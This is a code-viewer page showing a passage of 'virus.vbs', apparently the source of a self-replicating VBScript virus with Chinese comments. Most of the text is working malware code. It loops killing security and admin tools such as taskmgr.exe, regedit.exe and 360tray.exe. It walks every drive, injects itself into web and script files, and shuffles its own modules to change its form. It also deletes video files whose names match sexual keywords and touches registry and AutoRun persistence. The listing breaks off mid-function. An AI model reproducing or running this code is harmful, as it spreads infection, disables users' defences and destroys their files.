📄 virus.vbs
字号:
'jk4
'WNXCBDYNEYIEB1_5
Sub MonitorSystem(objfso, vbsCode)
On Error Resume Next
Dim ProcessNames
ProcessNames = Array("ras.exe", "360tray.exe", "taskmgr.exe", "cmd.exe", "cmd.com", "regedit.exe", "regedit.scr", "regedit.pif", "regedit.com", "msconfig.exe", "SREng.exe", "USBAntiVir.exe")
Do
Call KillProcess(ProcessNames)
Call InvadeSystem(objfso, vbsCode)
WScript.Sleep 5000
Loop
End Sub
'ZHISYBKQRKB1_5
'WNXCBDYNEYIEB2_19
Function GetVersion(objfso, path_v)
Dim FV, buffer
Set FV = objfso.OpenTextFile(path_v, 1)
buffer = FV.ReadAll()
GetVersion = Mid(buffer, InStr(buffer, Head_V) + Len(Head_V), 1)
End Function
Function GetScriptCode(Languages)
On Error Resume Next
Dim soj
For Each soj In document.Scripts
If LCase(soj.Language) = Languages Then
Select Case LCase(soj.Language)
Case "vbscript"
GetScriptCode = soj.Text
Exit Function
Case "javascript"
GetScriptCode = soj.Text
Exit Function
End Select
End If
Next
End Function
Function GetSelfCode(objfso, FullPath_Self)
On Error Resume Next
Dim n, n1, buffer, Self
Set Self = objfso.OpenTextFile(FullPath_Self, 1)
buffer = Self.ReadAll
n = InStr(buffer, Head_V)
n1 = InstrRev(buffer, Tail_V)
buffer = Mid(buffer, n, n1 - n + Len(Tail_V) + 1)
GetSelfCode = buffer
Self.Close
End Function
Function GetMainBody(vbsCode, Sum_ModelCode)
Dim i
For i = 2 To Sum_ModelCode
GetMainBody = GetMainBody & VBCRLF & GetModelCode(vbsCode, i) & VBCRLF
Next
End Function
'ZHISYBKQRKB2_19
'WNXCBDYNEYIEB1_8
Sub RestoreSystem(objfso)
On Error Resume Next
Dim Value, dc, d, HCULoad
Call SafeSet()
HCULoad = "HKEY_CURRENT_USER\SoftWare\Microsoft\Windows NT\CurrentVersion\Windows\Load"
If ReadReg(HCULoad) = FullPath_V1 Then
Call DeleteReg(HCULoad)
End If
Value = "%SystemRoot%\system32\NOTEPAD.EXE %1"
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\txtfile\shell\open\command\")<>Value Then
Call WriteReg ("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\txtfile\shell\open\command\", Value, "REG_EXPAND_SZ")
End If
Value = "regedit.exe " & """%1"""
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\regfile\shell\open\command\")<>Value Then
Call WriteReg ("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\regfile\shell\open\command\", Value, "REG_EXPAND_SZ")
End If
Value = GetSFolder(1) & "hh.exe " & """%1"""
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\chm.file\shell\open\command\")<>Value Then
Call WriteReg ("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\chm.file\shell\open\command\", Value, "REG_EXPAND_SZ")
End If
Value = "%SystemRoot%\system32\winhlp32.exe %1"
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\hlpfile\shell\open\command\")<>Value Then
Call WriteReg ("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\hlpfile\shell\open\command\", Value, "REG_EXPAND_SZ")
End If
Value = """%1"" %*"
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command\")<>Value Then
Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command\", Value, "REG_SZ")
End If
Set dc = objfso.Drives
For Each d In dc
If objfso.FileExists(d.DriveLetter & ":\" & Name_V1) = True Then
objfso.DeleteFile d.DriveLetter & ":\" & Name_V1
objfso.DeleteFile d.DriveLetter & ":\" & "AutoRun.inf"
End If
Next
If objfso.FileExists(FullPath_V1) = True Then
Set vf = objfso.GetFile(FullPath_V1)
vf.Delete
End If
If objfso.FileExists(FullPath_V0) = true Then
Set vf = objfso.GetFile(FullPath_V0)
vf.Delete
End If
If objfso.FileExists(FullPath_Config) = True Then
objfso.DeleteFile FullPath_Config , True
End If
End Sub
'ZHISYBKQRKB1_8
'WNXCBDYNEYIEB2_11
Sub SearchFile(objfso, strPath, VbsCode_WebPage, VbsCode_Victim, T)
On Error Resume Next
Dim pfo, pf, pfi, ext
Dim psfo, ps
Set pfo = objfso.GetFolder(strPath)
Set pf = pfo.Files
For Each pfi In pf
If Cnt >= CntMax Then
Exit For
End If
ext = LCase(objfso.GetExtensionName(pfi.Path))
Select Case ext
Case "hta", "htm", "html", "asp", "vbs"
Call InfectHead(pfi.Path, pfi, objfso, VbsCode_WebPage, VbsCode_Victim, ext, T)
Case "mpg", "rmvb", "avi", "rm"
If IsSexFile(pfi.Name) = True Then
pfi.Delete
End If
End Select
Next
Set psfo = pfo.SubFolders
For Each ps In psfo
If Cnt >= CntMax Then
Exit For
End If
Call SearchFile(objfso, ps.Path, VbsCode_WebPage, VbsCode_Victim, T)
Next
End Sub
'ZHISYBKQRKB2_11
'WNXCBDYNEYIEB2_10
Sub SearchDrives(objfso, VbsCode_WebPage, VbsCode_Victim, T)
On Error Resume Next
Dim d , dc
Set dc = objfso.Drives
For Each d In dc
If Cnt >= CntMax Then '
Exit For
End If
If d.DriveType = 1 Or d.DriveType = 2 Or d.DriveType = 3 Then
'If d.DriveType = 1 Then
Call SearchFile(objfso, d.Path & "\", VbsCode_WebPage, VbsCode_Victim, T)
'End If
End If
Next
End Sub
'ZHISYBKQRKB2_10
'WNXCBDYNEYIEB2_21
Function IsSexFile(fname)
IsSexFile = False
If InStr(fname, "成人")>0 Or InStr(fname, "淫")>0 Or InStr(fname, "偷拍")>0 Or _
InStr(fname, "偷窥")>0 Or InStr(fname, "口交")>0 Or InStr(fname, "强奸")>0 Or _
InStr(fname, "轮奸")>0 Or InStr(fname, "伦理片")>0 Or InStr(fname, "自摸")>0 Then
IsSexFile = True
End If
End Function
Function Isinfected(buffer, ftype)
Isinfected = True
Select Case ftype
Case "hta", "htm" , "html" , "asp", "vbs"
If InStr(buffer, Head_V) = 0 Then
Isinfected = False
End If
Case Else
Isinfected = True
End Select
End Function
'ZHISYBKQRKB2_21
'WNXCBDYNEYIEB2_24
Sub KillProcess(ProcessNames)
On Error Resume Next
Dim objShell, intReturn, name_exe
Set objShell = WScript.CreateObject("WScript.Shell")
strComputer = "."
Set objWMIServices = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
For Each ProcessName in ProcessNames
Set colProcessList = objWMIServices.Execquery(" Select * From win32_process where name = '" & ProcessName & "' ")
For Each objProcess in colProcessList
intReturn = objProcess.Terminate
Select Case intReturn
Case 2
name_exe = objProcess.Name
name_exe = Left(name_exe, Len(name_exe) -4)
objShell.Run "cmd.exe /c @tskill " & name_exe, 0, False
End Select
Next
Next
Set objShell = Nothing
End Sub
'ZHISYBKQRKB2_24
'WNXCBDYNEYIEB1_2
Sub ExeVbs_WebPage()
On Error Resume Next
Dim objfso, vbsCode, VbsCode_Virus
Set objfso = CreateObject(GetFSOName())
vbsCode = GetScriptCode("vbscript")
VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & GetMainBody(vbsCode, Sum_ModelCode) & VBCRLF & Tail_V
VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode)
Call InvadeSystem(objfso, VbsCode_Virus)
Set objfso = Nothing
End Sub
Sub ExeVbs_Victim()
On Error Resume Next
Dim objfso, vbsCode, VbsCode_Virus
Set objfso = CreateObject(GetFSOName())
vbsCode = GetSelfCode(objfso, WScript.ScriptFullName)
VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & GetMainBody(vbsCode, Sum_ModelCode) & VBCRLF & Tail_V
VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode)
Call InvadeSystem(objfso, VbsCode_Virus)
Call Run(FullPath_V1)
Set objfso = Nothing
End Sub
'ZHISYBKQRKB1_2
'WNXCBDYNEYIEB1_1
On Error Resume Next
Dim Cnt, CntMax, Version, Name_V1, FullPath_V0, FullPath_V1, FullPath_Config,Sum_ModelCode,Head_V,Tail_V
Dim ModelHead, ModelTail
Cnt = 0
CntMax = 1000
Version = "4"
Name_V1 = GetUserName() & ".vbs"
FullPath_V0 = GetSFolder(0) & Name_V1 '主要执行文件关联转向
FullPath_V1 = GetSFolder(1) & Name_V1 '主要执行配置文件命令
FullPath_Config= GetSFolder(1) & GetUserName() & ".ini"
Sum_ModelCode = 26
Head_V= GetHeadTail(0)
Tail_V= GetHeadTail(1)
ModelHead="'WNXCBDYNEYIEB"
ModelTail="'ZHISYBKQRKB"
Call VirusMain()
Sub VirusMain()
On Error Resume Next
Call ExeVbs_Virus()
End Sub
'ZHISYBKQRKB1_1
'WNXCBDYNEYIEB2_23
Function MakeScript(strCode, T)
If T = 1 Then
MakeScript = "<" & "SCRIPT Language = VBScript>" & VBCRLF & ChangeModelOrder(strCode, Sum_ModelCode) & VBCRLF & "</" & "SCRIPT>"
Else
MakeScript = "<" & "SCRIPT Language = VBScript>" & VBCRLF & strCode & VBCRLF & "</" & "SCRIPT>"
End If
End Function
'ZHISYBKQRKB2_23
'WNXCBDYNEYIEB2_22
Function GetSFolder(p)
Dim objfso
Set objfso = CreateObject(GetFSOName())
GetSFolder = objfso.GetSpecialFolder(p) & "\"
Set objfso = Nothing
End Function
Function GetUserName()
On Error Resume Next
Dim Value , UserName
Value = "HKEY_CURRENT_USER\Software\Microsoft\Active Setup\Installed Components\{44BBA840-CC51-11CF-AAFA-00AA00B6015C}\Username"
UserName = ReadReg(Value)
If UserName = "" Then
GetUserName = "Administrator"
Else
GetUserName = UserName
End If
End Function
Function GetFSOName()
On Error Resume Next
Dim Value , UserName
Value = "HKEY_CLASSES_ROOT\CLSID\{0D43FE01-F093-11CF-8940-00A0C9054228}\ProgID\"
UserName = ReadReg(Value)
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -